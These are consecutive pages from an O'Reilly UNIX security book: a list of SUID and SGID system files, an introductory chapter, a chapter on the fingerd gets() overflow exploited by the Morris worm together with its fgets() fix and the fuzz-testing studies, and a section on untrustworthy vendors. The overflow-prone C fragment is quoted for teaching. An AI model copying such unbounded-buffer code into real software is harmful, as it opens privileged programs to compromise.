xterm is SUID because it needs to be able to change the ownership of the pty that it creates for the X terminal. getcons is<br />

SUID because it needs to be able to execute a privileged kernel call.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appb_03.htm (6 of 7) [2002-04-12 10:45:19]


[Appendix B] B.3 SUID and SGID Files<br />

B.3.2.2 SGID files<br />

-rwxr-sr-x 1 root kmem 4772 Nov 11 17:07 /usr/etc/arp<br />

-rwxr-sr-x 1 root kmem 2456 Nov 11 17:14 /usr/etc/dmesg<br />

-rwxr-sr-x 1 root kmem 4276 Nov 11 17:35 /usr/etc/kgmon<br />

-rwxr-sr-x 1 root kmem 5188 Nov 11 18:16 /usr/etc/vmmprint<br />

-rwxr-sr-x 1 root kmem 3584 Nov 11 18:16 /usr/etc/vmoprint<br />

-rwxr-sr-x 1 root kmem 5520 Nov 11 20:38 /usr/etc/nfsstat<br />

-r-xr-sr-x 1 root kmem 32768 Oct 22 10:30 /usr/ucb/gprof<br />

-rwxr-sr-x 1 root kmem 40960 Nov 11 18:39 /usr/ucb/netstat<br />

-rwxr-sr-x 1 root kmem 24576 Nov 11 18:57 /usr/ucb/sysline<br />

-rwxr-sr-x 1 root kmem 76660 Jun 8 03:56 /usr/bin/X11/xload<br />

These commands are SGID because they need to be able to access the kernel's memory.<br />

-rwxr-sr-x 1 root tty 2756 Nov 11 17:05 /bin/wall<br />

-rwxr-sr-x 1 root tty 4272 Nov 11 17:06 /bin/write<br />

These commands are SGID because they need to be able to access the raw terminal devices.<br />

---s--s--x 1 uucp daemon 90112 Nov 11 20:25 /usr/lib/uucp/uucico<br />

---s--s--x 1 uucp daemon 11136 Nov 11 20:25 /usr/lib/uucp/uuclean<br />

---s--s--- 1 uucp daemon 32768 Nov 11 20:26 /usr/lib/uucp/uuxqt<br />

---s--s--x 1 uucp daemon 24576 Nov 11 20:25 /usr/bin/uucp<br />

---s--s--x 1 uucp daemon 24576 Nov 11 20:25 /usr/bin/uux<br />

---s--s--x 1 uucp daemon 4620 Nov 11 20:25 /usr/bin/uulog<br />

---s--s--x 1 uucp daemon 5776 Nov 11 20:25 /usr/bin/uuname<br />

---s--s--x 1 uucp daemon 4260 Nov 11 20:26 /usr/bin/uusnap<br />

---s--s--x 1 uucp daemon 24576 Nov 11 20:26 /usr/bin/uupoll<br />

---s--s--x 1 uucp daemon 8716 Nov 11 20:26 /usr/bin/uuq<br />

---s--s--x 2 uucp daemon 3548 Nov 11 20:26 /usr/bin/uusend<br />

---s--s--x 2 uucp daemon 3548 Nov 11 20:26 /usr/bin/ruusend<br />

These commands are all SGID because they need to be able to access UUCP spool files.<br />

-rwx--s--x 1 root daemon 24576 Oct 27 18:39 /usr/etc/lpc<br />

-rws--s--x 1 root daemon 40960 Oct 27 18:39 /usr/lib/lpd<br />

-rws--s--x 1 root daemon 24576 Oct 27 18:39 /usr/ucb/lpr<br />

-rws--s--x 1 root daemon 24576 Oct 27 18:39 /usr/ucb/lpq<br />

-rws--s--x 1 root daemon 24576 Oct 27 18:39 /usr/ucb/lprm<br />

These commands are all SGID because they need to be able to access the line-printer device and spool files.<br />

-rwxr-sr-x 1 root operator 6700 Nov 11 16:53 /bin/df<br />

This command is SGID because it needs access to the raw disk device (which is owned by the group operator on some<br />

versions of Berkeley <strong>UNIX</strong>).<br />

B.2 Important Files in Your<br />

Home Directory<br />

C. <strong>UNIX</strong> Processes<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/appb_03.htm (7 of 7) [2002-04-12 10:45:19]


[Chapter 1] Introduction<br />

1. Introduction<br />

Contents:<br />

What Is Computer <strong>Sec</strong>urity?<br />

What Is an Operating System?<br />

History of <strong>UNIX</strong><br />

<strong>Sec</strong>urity and <strong>UNIX</strong><br />

Role of This Book<br />

Chapter 1<br />

In today's world of international networks and electronic commerce, every computer system is a potential<br />

target. Rarely does a month go by without news of some major network or organization having its<br />

computers penetrated by unknown computer criminals. Although some computer "hackers" (see the<br />

sidebar below) have said that such intrusions are merely teenage pranks or fun and games, these<br />

intrusions have become more sinister in recent years: computers have been rendered inoperable; records<br />

have been surreptitiously altered; software has been replaced with secret "back doors" in place;<br />

proprietary information has been copied without authorization; and millions of passwords have been<br />

captured from unsuspecting users.<br />

Even if nothing is removed or altered, system administrators must often spend hours or days reloading<br />

and reconfiguring a compromised system to regain some level of confidence in the system's integrity.<br />

There is no way to know the motives of an intruder and the worst must be assumed. People who break<br />

into systems simply to "look around" do real damage, even if they do not read confidential mail and do<br />

not delete any files. If computer security was once the subject of fun and games, those days have long<br />

since passed.<br />

Many different kinds of people break into computer systems. Some people - perhaps the most widely<br />

publicized - are the equivalent of reckless teenagers out on electronic joy rides. Like youths who<br />

"borrow" fast cars, their main goal isn't necessarily to do damage, but to have what they consider to be a<br />

good time. Others are far more dangerous: some people who compromise system security are sociopaths,<br />

joyriding around the networks bent on inflicting damage on unsuspecting computer systems. Others see<br />

themselves at "war" with rival hackers; woe to innocent users and systems who happen to get in the way<br />

of cyberspace "drive-by shootings!" Still others are out for valuable corporate information, which they<br />

hope to resell for profit. There are also elements of organized crime, spies and saboteurs motivated by<br />

both greed and politics, terrorists, and single-minded anarchists using computers and networks.<br />

Who Is a Computer Hacker?<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_01.htm (1 of 4) [2002-04-12 10:45:20]


[Chapter 1] Introduction<br />

HACKER noun 1. A person who enjoys learning the details of computer systems and how<br />

to stretch their capabilities - as opposed to most users of computers, who prefer to learn only<br />

the minimum amount necessary. 2. One who programs enthusiastically or who enjoys<br />

programming rather than just theorizing about programming.<br />

Guy L. Steele, et al., The Hacker's Dictionary<br />

There was a time when computer security professionals argued over the term "hacker." Some thought<br />

that hackers were excellent and somewhat compulsive computer programmers, like Richard Stallman,<br />

founder of the Free Software Foundation. Others thought that hackers were computer criminals, more<br />

like convicted felon Mark Abene, a.k.a "Phiber Optik." Complicating this discussion was the fact that<br />

many computer security professionals had formerly been hackers themselves - of both persuasions. Some<br />

were anxious to get rid of the word, while others wished to preserve it.<br />

Today the confusion over the term hacker has largely been resolved. While some computer professionals<br />

continue to call themselves "hackers," most don't. In the mind of the public, the word "hacker" has been<br />

firmly defined as a person exceptionally talented with computers who often misuses that skill. Use of the<br />

term by members of the news media, law enforcement, and the entertainment industry has only served to<br />

reinforce this definition.<br />

In some cases, we'll refer to people who break into computers, and present a challenge for computer<br />

security, by a variety of names: "crackers," "bad guys," and occasionally "hackers." However, in general,<br />

we will try to avoid these labels and use more descriptive terms: "intruders," "vandals," or simply,<br />

"criminals."<br />

The most dangerous computer criminals are usually insiders (or former insiders), because they know<br />

many of the codes and security measures that are already in place. Consider the case of a former<br />

employee who is out for revenge. The employee probably knows which computers to attack, which files<br />

will cripple the company the most if deleted, what the defenses are, and where the backup tapes are<br />

stored.<br />

Despite the risks, interest in computer networking and the <strong>Internet</strong> has never been greater. The number of<br />

computers attached to the <strong>Internet</strong> has approximately doubled every year for nearly a decade. By all<br />

indications, this growth is likely to continue for several years to come. With this increased interest in the<br />

<strong>Internet</strong>, there has been growing interest in <strong>UNIX</strong> as the operating system of choice for <strong>Internet</strong><br />

gateways, high-end research machines, and advanced instructional platforms.<br />

Years ago, <strong>UNIX</strong> was generally regarded as an operating system that was difficult to secure. This<br />

reputation was partially unfounded. Although part of <strong>UNIX</strong>'s poor reputation came from design flaws<br />

and bugs, a bigger cause for blame rested with the traditional use of <strong>UNIX</strong> and with the poor security<br />

consciousness of its users. For its first 15 years, <strong>UNIX</strong> was used primarily in academia, the computing<br />

research community, the telephone company, and the computer industry itself. In most of these<br />

environments, computer security was not a priority (until perhaps recently). Users in these environments<br />

often configured their systems with lax controls, and even developed philosophies that viewed strong<br />

security as something to avoid. Because they cater to this community (and hire from it), many <strong>UNIX</strong><br />

vendors have developed a culture that has been slow to incorporate more practical security mechanisms<br />

into their products.[1]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_01.htm (2 of 4) [2002-04-12 10:45:20]


[Chapter 1] Introduction<br />

[1] James Ellis at CERT suggests that another reason for <strong>UNIX</strong>'s poor security record has to<br />

do with the wide-spread availability of <strong>UNIX</strong> source code, which allows for detailed<br />

inspection by potential attackers for weaknesses. Buffer overflows or coding errors that<br />

would be reported on other systems as merely causing crashes are reported frequently on<br />

<strong>UNIX</strong> with detailed programs that break system security.<br />

Perhaps the best known demonstration of <strong>UNIX</strong> vulnerability to date occurred in November 1988. That<br />

was when Robert T. Morris released his infamous "<strong>Internet</strong> worm" program, which spread to thousands<br />

of computers in a matter of hours. That event served as a major wake-up call for many <strong>UNIX</strong> users and<br />

vendors. Since then, users, academics, and computer manufacturers have usually worked together to try<br />

to improve the security of the <strong>UNIX</strong> operating system. Many of the results of those efforts are described<br />

in this book.<br />

But despite the increasing awareness and the improvements in defenses, the typical <strong>UNIX</strong> system is still<br />

exposed to many dangers. The purpose of this book is to give readers a fundamental understanding of the<br />

principles of computer security and to show how they apply to the <strong>UNIX</strong> operating system. We hope to<br />

show you practical techniques and tools for making your system as secure as possible, especially if it is<br />

running some version of <strong>UNIX</strong>. Whether you are a user or administrator, we hope that you will find<br />

value in these pages.<br />

1.1 What Is Computer <strong>Sec</strong>urity?<br />

Terms like security, protection, and privacy often have more than one meaning. Even professionals who<br />

work in information security do not agree on exactly what these terms mean. The focus of this book is<br />

not formal definitions and theoretical models so much as practical, useful information. Therefore, we'll<br />

use an operational definition of security and go from there.<br />

Computer <strong>Sec</strong>urity: "A computer is secure if you can depend on it and its software to behave as you<br />

expect."<br />

If you expect the data entered into your machine today to be there in a few weeks, and to remain unread<br />

by anyone who is not supposed to read it, then the machine is secure. This concept is often called trust:<br />

you trust the system to preserve and protect your data.<br />

By this definition, natural disasters and buggy software are as much threats to security as unauthorized<br />

users. This belief is obviously true from a practical standpoint. Whether your data is erased by a vengeful<br />

employee, a random virus, an unexpected bug, or a lightning strike - the data is still gone.<br />

Our practical definition might also imply to some that security is concerned with issues of testing your<br />

software and hardware, and with preventing user mistakes. However, we don't intend our definition to be<br />

that inclusive. That's why the word "practical" is in the title of this book - and why we won't try to be<br />

more specific about defining what "security" is, exactly. A formal definition wouldn't necessarily help<br />

you any more than our working definition, and would require detailed explanations of risk assessment,<br />

asset valuation, policy formation, and a number of other topics beyond what we are able to present here.<br />

On the other hand, knowing something about these concepts is important in the long run. If you don't<br />

know what you're protecting, why you're protecting it, and what you are protecting it from, your task will<br />

be rather difficult! Furthermore, you need to understand how to establish and apply uniform security<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_01.htm (3 of 4) [2002-04-12 10:45:20]


[Chapter 1] Introduction<br />

policies. Much of that is beyond the scope of what we hope to present here; thus, we'll discuss a few of<br />

these topics in Chapter 2, Policies and Guidelines, Policies and Guidelines. We'll also recommend that<br />

you examine some of the references available. Several good introductory texts in this area, including<br />

Computer <strong>Sec</strong>urity Basics (Russell and Gangemi), Computer Crime: A Crimefighter's Handbook (Seger,<br />

VonStorch, and Icove), and Control and <strong>Sec</strong>urity of Computer Information Systems (Fites, Kratz, and<br />

Brebner) are listed in Appendix D, Paper Sources. Other texts, university courses, and professional<br />

organizations can provide you with more background. <strong>Sec</strong>urity isn't a set of tricks, but an ongoing area of<br />

specialization.<br />

This book emphasizes techniques to help keep your system safe from other people - including both<br />

insiders and outsiders, those bent on destruction, and those who are simply ignorant or untrained. The<br />

text does not detail every specific security-related feature that is available only on certain versions of<br />

<strong>UNIX</strong> from specific manufacturers: companies that take the time to develop such software usually<br />

deliver it with sufficient documentation.<br />

Throughout this book, we will be presenting mechanisms and methods of using them. To decide which<br />

mechanisms are right for you, take a look at Chapter 2. Remember, each site must develop its own<br />

overall security policies, and those policies will determine which mechanisms are appropriate to use. End<br />

users should also read Chapter 2 - users should be aware of policy considerations, too.<br />

For example, if your local policy is that all users can build and install programs that can be accessed by<br />

other users, then you may wish to set the file permissions on /usr/local/bin to be mode 1777, which<br />

allows users to add their own files but does not generally allow them to delete files placed there by other<br />

users. If you don't wish to take the risk of allowing users to install publicly accessible programs that<br />

might contain Trojan horses or trap doors,[2] a more appropriate file permissions setting for<br />

/usr/local/bin might be 755.[3]<br />

[2] For an example of such a program, consider a rogue user who installs a program called ls<br />

that occasionally deletes files instead of listing them.<br />

[3] See Chapter 5, The <strong>UNIX</strong> Filesystem, for a discussion of these protection modes.<br />

I. Computer <strong>Sec</strong>urity Basics 1.2 What Is an Operating<br />

System?<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch01_01.htm (4 of 4) [2002-04-12 10:45:20]


[Chapter 23] Writing <strong>Sec</strong>ure SUID and Network Programs<br />

Chapter 23<br />

23. Writing <strong>Sec</strong>ure SUID and Network<br />

Programs<br />

Contents:<br />

One Bug Can Ruin Your Whole Day...<br />

Tips on Avoiding <strong>Sec</strong>urity-related Bugs<br />

Tips on Writing Network Programs<br />

Tips on Writing SUID/SGID Programs<br />

Tips on Using Passwords<br />

Tips on Generating Random Numbers<br />

<strong>UNIX</strong> Pseudo-Random Functions<br />

Picking a Random Seed<br />

A Good Random Seed Generator<br />

With a few minor exceptions, the underlying security model of the <strong>UNIX</strong> operating system - a privileged<br />

kernel, user processes, and the superuser who can perform any system management function - is<br />

fundamentally workable. But if that is the case, then why has <strong>UNIX</strong> had so many security problems in<br />

recent years? The answer is simple: although the <strong>UNIX</strong> security model is basically sound, programmers<br />

are careless. Most security flaws in <strong>UNIX</strong> arise from bugs and design errors in programs that run as root<br />

or with other privileges, as a result of configuration errors, or through the unanticipated interactions<br />

between such programs.<br />

23.1 One Bug Can Ruin Your Whole Day...<br />

The disadvantage of the <strong>UNIX</strong> security model is that it makes a tremendous investment in the infallibility<br />

of the superuser and in the software that runs with the privileges of the superuser. If the superuser<br />

account is compromised, then the system is left wide open. Hence our many admonitions in this book to<br />

protect the superuser account, and to restrict the number of people who must know the password.<br />

Unfortunately, even if you prevent users from logging into the superuser account, many <strong>UNIX</strong> programs<br />

need to run with superuser privileges. These programs are run as SUID root programs, when the system<br />

boots, or as network servers. A single bug in any of these complicated programs can compromise the<br />

safety of your entire system. This characteristic is probably a design flaw, but it is basic to the design of<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_01.htm (1 of 5) [2002-04-12 10:45:20]


[Chapter 23] Writing <strong>Sec</strong>ure SUID and Network Programs<br />

<strong>UNIX</strong>, and is not likely to change.<br />

23.1.1 The Lesson of the <strong>Internet</strong> Worm<br />

One of the best-known examples of such a flaw was a single line of code in the program /etc/fingerd, the<br />

finger server, exploited in 1988 by Robert T. Morris's <strong>Internet</strong> Worm. fingerd provides finger service<br />

over the network. One of the very first lines of the program reads a single line of text from standard input<br />

containing the name of the user that is to be "fingered."<br />

The original fingerd program contained these lines of code:<br />

char line[512];<br />

line[0]<br />

= "\0";<br />

gets(line);<br />

Because the gets() function does not check the length of the line read, a rogue program could supply<br />

more than 512 bytes of valid data, enabling the stack frame of the fingerd server to be overrun. Morris[1]<br />

wrote code that caused fingerd to execute a shell; because fingerd was usually installed to run as the<br />

superuser, the rogue program inherited virtually unrestricted access to the server computer. (fingerd<br />

didn't really need to run as superuser - that was simply the default configuration.)<br />

[1] Or someone else. As noted in Spafford's original analysis of the code (see Appendix D,<br />

Paper Sources), there is some indication that Morris did not write this portion of the Worm<br />

program.<br />

The fix for the finger program was simple: replace the gets() function with the fgets() function, which<br />

does not allow its input buffer length to be exceeded:<br />

fgets(line,sizeof(line),stdin);<br />

Fortunately, the Morris version did not explicitly damage programs or data on computers that it<br />

penetrated.[2] Nevertheless, it illustrated the fact that any network service program can potentially<br />

compromise the system. Furthermore, the flaw was unnoticed in the finger code for more than six years,<br />

from the time of the first Berkeley <strong>UNIX</strong> network software release until the day that the Worm ran loose.<br />

Remember this lesson: because a hole has never been discovered in a program does not mean that no<br />

hole exists.<br />

[2] However, as the worm did run with privileges of the superuser, it could have altered the<br />

compromised system in any number of ways.<br />

Interestingly enough, the fallible human component is illustrated by the same example. Shortly after the<br />

problem with the gets() subroutine was exposed, the Berkeley group went through all of its code and<br />

eliminated every similar use of the gets() call in a network server. Most vendors did the same with their<br />

code. Several people, including one of us, publicly warned that uses of other library calls that wrote to<br />

buffers without bounds checks also needed to be examined. These included calls to the sprintf() routine,<br />

and byte-copy routines such as strcpy().<br />

In late 1995, as we were finishing the second edition of this book, a new security vulnerability in several<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_01.htm (2 of 5) [2002-04-12 10:45:20]


[Chapter 23] Writing <strong>Sec</strong>ure SUID and Network Programs<br />

versions of <strong>UNIX</strong> was widely publicized. It was based on buffer overruns in the syslog library routine.<br />

An attacker could carefully craft an argument to a network daemon such that, when an attempt was made<br />

to log it using syslog, the message overran the buffer and compromised the system in a manner<br />

hauntingly similar to the fingerd problem. After seven years, a cousin to the fingerd bug was discovered.<br />

What underlying library calls contribute to the problem? The sprintf() library call does, and so do<br />

byte-copy routines such as strcpy().<br />

While programming tools and methods are regrettable and lead to many <strong>UNIX</strong> security bugs, the failure<br />

to learn from old mistakes is even more regrettable.<br />

23.1.2 An Empirical Study of the Reliability of <strong>UNIX</strong> Utilities<br />

In December 1990, the Communications of the ACM published an article by Miller, Fredrickson, and So,<br />

entitled "An Empirical Study of the Reliability of <strong>UNIX</strong> Utilities" (Volume 33, issue 12, pp. 32-44). The<br />

paper started almost as a joke: a researcher was logged into a <strong>UNIX</strong> computer from home, and the<br />

programs he was running kept crashing because of line noise from a poor modem connection. Eventually<br />

Barton Miller, a professor at the University of Wisconsin, decided to subject the <strong>UNIX</strong> utility programs<br />

from a variety of different vendors to a selection of random inputs and monitor the results.<br />

23.1.2.1 What they found<br />

The results were discouraging. Between 25% and 33% of the <strong>UNIX</strong> utilities could be crashed or hung by<br />

supplying them with unexpected inputs - sometimes input that was as simple as an end-of-file on the<br />

middle of an input line. On at least one occasion, crashing a program tickled an operating system bug and<br />

caused the entire computer to crash. Many times, programs would freeze for no apparent reason.<br />

In 1995 a new team headed by Miller repeated the experiment, this time running a program called Fuzz<br />

on nine different <strong>UNIX</strong> platforms. The team also tested <strong>UNIX</strong> network servers, and a variety of X<br />

Windows applications (both clients and servers).[3] Here are some of the highlights:<br />

●<br />

●<br />

●<br />

[3] You can download a complete copy of the papers from<br />

ftp://grilled.cs.wisc.edu/technical_papers/fuzz-revisited.ps.Z.<br />

According to the 1995 paper, vendors were still shipping a distressingly buggy set of programs:<br />

"...the failure rate of utilities on the commercial versions of <strong>UNIX</strong> that we tested (from Sun, IBM,<br />

SGI, DEC, and NeXT) ranged from 15-43%."<br />

<strong>UNIX</strong> vendors don't seem to be overly concerned about bugs in their programs: "Many of the bugs<br />

discovered (approximately 40%) and reported in 1990 are still present in their exact form in 1995.<br />

The 1990 study was widely published in at least two languages. The code was made freely<br />

available via anonymous FTP. The exact random data streams used in our testing were made freely<br />

available via FTP. The identification of failures that we found were also made freely available via<br />

FTP; these include code fragments with file and line numbers for the errant code. According to our<br />

records, over 2000 copies of the...tools and bug identifications were fetched from our FTP sites...It<br />

is difficult to understand why a vendor would not partake of a free and easy source of reliability<br />

improvements."<br />

The two lowest failure rates in the study were the Free Software Foundation's GNU utilities<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_01.htm (3 of 5) [2002-04-12 10:45:20]


[Chapter 23] Writing <strong>Sec</strong>ure SUID and Network Programs<br />

(failure rate of 7%) and the utilities included with the freely distributed Linux version of the <strong>UNIX</strong><br />

operating system (failure rate 9%).[4] Interestingly enough, the Free Software Foundation has<br />

strict coding rules that forbid the use of fixed-length buffers. (Miller et al failed to note that many<br />

of the Linux utilities were repackaged GNU utilities.)<br />

[4] We don't believe that 7% is an acceptable failure rate, either.<br />

There were a few bright points in the 1995 paper. Most notable was the fact that Miller et al. were unable<br />

to crash any <strong>UNIX</strong> network server. The group was also unable to crash any X Windows server.<br />

On the other hand, the group discovered that many X clients will readily crash when fed random streams<br />

of data. Others will lock up - and in the process, freeze the X server until the programs are terminated.<br />

23.1.2.2 Where's the beef?<br />

Many of the errors that Miller's group discovered result from common programming mistakes with the C<br />

programming language - programmers who wrote clumsy or confusing code that did the wrong things;<br />

programers who neglected to check for array boundary conditions; and programmers who assumed that<br />

their char variables were unsigned, when in fact they are signed.<br />

While these errors can certainly cause programs to crash when they are fed random streams of data, these<br />

errors are exactly the kinds of problems that can be exploited by carefully crafted streams of data to<br />

achieve malicious results. Think back to the <strong>Internet</strong> Worm: if attacked by the Miller Fuzz program, the<br />

original fingerd program would have crashed. But when presented with the carefully crafted stream that<br />

was present in the Morris Worm, the program gave its attacker a root shell!<br />

What is somewhat frightening about the study is that the tests employed by Miller's group are among the<br />

least comprehensive known to testers - random, black-box testing. Different patterns of input could<br />

possibly cause more programs to fail. Inputs made under different environmental circumstances could<br />

also lead to abnormal behavior. Other testing methods could expose these problems where random<br />

testing, by its very nature, would not.<br />

Miller's group also found that use of several commercially available tools enabled them to discover errors<br />

and perform other tests, including discovery of buffer overruns and related memory errors. These tools<br />

are readily available; however, vendors are apparently not using them.<br />

Why don't vendors care more about quality? Well, according to many of them, they do care, but quality<br />

does not sell. Writing good code and testing it carefully is not a quick or simple task. It requires extra<br />

effort, and extra time. The extra time spent on ensuring quality will result in increased cost. To date, few<br />

customers (possibly including you, gentle reader) have indicated a willingness to pay extra for<br />

better-quality software. Vendors have thus put their efforts into what customers are willing to buy, such<br />

as new features. Although we believe that most vendors could do a better job in this respect (and some<br />

could do a much better job), we must be fair and point the finger at the user population, too.<br />

In some sense, any program you write might fare as well as vendor-supplied software. However, that isn't<br />

good enough if the program is running in a sensitive role and might be abused. Therefore, you must<br />

practice good coding habits, and pay special attention to common trouble spots.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_01.htm (4 of 5) [2002-04-12 10:45:20]


[Chapter 23] Writing <strong>Sec</strong>ure SUID and Network Programs<br />

22.6 Writing Your Own<br />

Wrappers<br />

23.2 Tips on Avoiding<br />

<strong>Sec</strong>urity-related Bugs<br />

[ Library Home | DNS & BIND | TCP/IP | sendmail | sendmail Reference | Firewalls | <strong>Practical</strong> <strong>Sec</strong>urity ]<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch23_01.htm (5 of 5) [2002-04-12 10:45:20]


[Chapter 27] 27.2 Can You Trust Your Suppliers?<br />

Chapter 27<br />

Who Do You Trust?<br />

27.2 Can You Trust Your Suppliers?<br />

Your computer does something suspicious. You discover that the modification dates on your system<br />

software have changed. It appears that an attacker has broken in, or that some kind of virus is spreading.<br />

So what do you do? You save your files to backup tapes, format your hard disks, and reinstall your<br />

computer's operating system and programs from the original distribution media.<br />

Is this really the right plan? You can never know. Perhaps your problems were the result of a break-in.<br />

But sometimes, the worst is brought to you by the people who sold you your hardware and software in<br />

the first place.<br />

27.2.1 Hardware Bugs<br />

The fact that Intel Pentium processors had a floating-point problem that infrequently resulted in a<br />

significant loss of precision when performing some division operations was revealed to the public in<br />

1994. Not only had Intel officials known about this, but apparently they had decided not to tell their<br />

customers until after there was significant negative public reaction.<br />

Several vendors of disk drives have had problems with their products failing suddenly and<br />

catastrophically, sometimes within days of being placed in use. Other disk drives failed when they were<br />

used with <strong>UNIX</strong>, but not with the vendor's own proprietary operating system. The reason: <strong>UNIX</strong> did not<br />

run the necessary command to map out bad blocks on the media. Yet, these drives were widely bought<br />

for use with the <strong>UNIX</strong> operating system.<br />

Furthermore, there are many cases of effective self-destruct sequences in various kinds of terminals and<br />

computers. For example, Digital's original VT100 terminal had an escape sequence that switched the<br />

terminal from a 60Hz refresh rate to a 50Hz refresh rate, and another escape sequence that switched it<br />

back. By repeatedly sending the two escape sequences to a VT100 terminal, a malicious programmer<br />

could cause the terminal's flyback transformer to burn out - sometimes spectacularly!<br />

A similar sequence of instructions could be used to break the monochrome monitor on the original IBM<br />

PC video display.<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_02.htm (1 of 6) [2002-04-12 10:45:21]


[Chapter 27] 27.2 Can You Trust Your Suppliers?<br />

27.2.2 Viruses on the Distribution Disk<br />

A few years ago, there was a presumption in the field of computer security that manufacturers who<br />

distributed computer software took the time and due diligence to ensure that their computer programs, if<br />

not free of bugs and defects, were at least free of computer viruses and glaring computer security holes.<br />

Users were warned not to run shareware and not to download programs from bulletin board systems,<br />

because such programs were likely to contain viruses or Trojan horses. Indeed, at least one company,<br />

which manufactured a shareware virus scanning program, made a small fortune telling the world that<br />

everybody else's shareware programs were potentially unsafe.<br />

Time and experience have taught us otherwise.<br />

In recent years, a few viruses have been distributed with shareware, but we have also seen many viruses<br />

distributed in shrink-wrapped programs. The viruses come from small companies, and from the makers<br />

of major computer systems. Even Microsoft distributed a CD-ROM with a virus hidden inside a macro<br />

for Microsoft Word. The Bureau of the Census distributed a CD-ROM with a virus on it. One of the<br />

problems posed by viruses on distribution disks is that many installation procedures require that the user<br />

disable any antiviral software that is running.<br />

The mass-market software industry has also seen a problem with logic bombs and Trojan horses. For<br />

example, in 1994, Adobe distributed a version of a new Photoshop 3.0 for the Macintosh with a "time<br />

bomb" designed to make the program stop working at some point in the future; the time bomb had<br />

inadvertently been left in the program from the beta-testing cycle. Because commercial software is not<br />

distributed in source code form, you cannot inspect a program and tell if this kind of intentional bug is<br />

present or not.<br />

Like shrink-wrapped programs, shareware is also a mixed bag. Some shareware sites have system<br />

administrators who are very conscientious, and who go to great pains to scan their software libraries with<br />

viral scanners before making them available for download. Other sites have no controls, and allow users<br />

to place files directly in the download libraries. In the spring of 1995, a program called PKZIP30.EXE<br />

made its way around a variety of FTP sites on the <strong>Internet</strong> and through America Online. This program<br />

appeared to be the 3.0 beta release of PKZIP, a popular DOS compression utility. But when the program<br />

was run, it erased the user's hard disk.<br />

27.2.3 Buggy Software<br />

Consider the following, rather typical, disclaimer on a piece of distributed software:<br />

NO WARRANTY OF PERFORMANCE. THE PROGRAM AND ITS ASSOCIATED<br />

DOCUMENTATION ARE LICENSED "AS IS" WITHOUT WARRANTY AS TO THEIR<br />

PERFORMANCE, MERCHANTABILITY, OR FITNESS FOR ANY PARTICULAR<br />

PURPOSE. THE ENTIRE RISK AS TO THE RESULTS AND PERFORMANCE OF THE<br />

PROGRAM IS ASSUMED BY YOU AND YOUR DISTRIBUTEES. SHOULD THE<br />

PROGRAM PROVE DEFECTIVE, YOU AND YOUR DISTRIBUTEES (AND NOT THE<br />

VENDOR) ASSUME THE ENTIRE COST OF ALL NECESSARY SERVICING,<br />

REPAIR, OR CORRECTION.<br />

Software sometimes has bugs. You install it on your disk, and under certain circumstances, it damages<br />

file:///C|/Oreilly Unix etc/<strong>O'Reilly</strong> Reference Library/networking/puis/ch27_02.htm (2 of 6) [2002-04-12 10:45:21]


[Chapter 27] 27.2 Can You Trust Your Suppliers?<br />

your files or returns incorrect results. The examples are legion. You may think that the software is<br />

infected with a virus - it is certainly behaving as if it is infected with a virus - but the problem is merely<br />

the result of poor programming.<br />

If the creators and vendors of the software don't have confidence in their own software, why should you?<br />

If the vendors disclaim "...warranty as to [its] performance, merchantability, or fitness for any particular<br />

purpose," then why are you paying them money and using their software as a base for your business?<br />

Unfortunately, quality is not a priority for most software vendors. In most cases, they license the<br />

software to you with a broad disclaimer of warranty (similar to the above) so there is little incentive for<br />

them to be sure that every bug has been eradicated before they go to market. The attitude is often one of<br />

"We'll fix it in the next release, after the customers have found all the bugs." Then they introduce new<br />

features with new bugs. Yet people wait in line at midnight to be the first to buy software that is full of<br />

bugs and may erase their disks when they try to install it.<br />

Other bugs abound. Recall that the first study by Professor Barton Miller, cited in Chapter 23, Writing<br />

<strong>Sec</strong>ure SUID and Network Programs, found that more than one-third of common programs supplied by<br />

several <strong>UNIX</strong> vendors crashed or hung when they were tested with a trivial program that generated<br />

random input. Five years later, he reran the tests. The results? Although most vendors had improved to<br />

where "only" one-fourth of the programs crashed, one vendor's software exhibited a 46% failure rate!<br />

This failure rate was despite wide circulation and publication of the report, and despite the fact that<br />

Miller's team made the test code available for free to vendors.<br />

Most frightening, the testing performed by Miller's group is one of the simplest, least-effective forms of<br />

testing that can be performed (random, black-box testing). Do vendors do any reasonable testing at all?<br />

Consider the case of a software engineer from a major PC software vendor who came to Purdue to recruit<br />

in 1995. During his presentation, students reported that he stated that two of the top 10 reasons to work<br />

for his company were "You don't need to bother with that software engineering stuff - you simply need to<br />

love to code" and "You'd rather write assembly code than test software." As you might expect, the<br />

company has developed a reputation for quality problems. What is surprising is that they continue to be a<br />

market leader, year after year, and that people continue to buy their software.[3]<br />

[3] The same company introduced a product that responded to a wrong password being<br />

typed three times in a row by prompting the user with something to the effect of, "You<br />

appear to have set your password to something too difficult to remember. Would you like to<br />

set it to something simpler?" Analysis of this approach is left as an exercise for the reader.<br />

What's your vendor's policy about testing and good software engineering practices?<br />

Or, consider the case of someone who implements security features without really understanding the "big<br />

picture." As we noted in "Picking a Random Seed" in Chapter 23, a sophisticated encryption algorithm<br />

was built into Netscape Navigator to protect credit card numbers in transit on the network. Unfortunately,<br />

the implementation used a weak initialization of the "random number" used to generate a system key.<br />

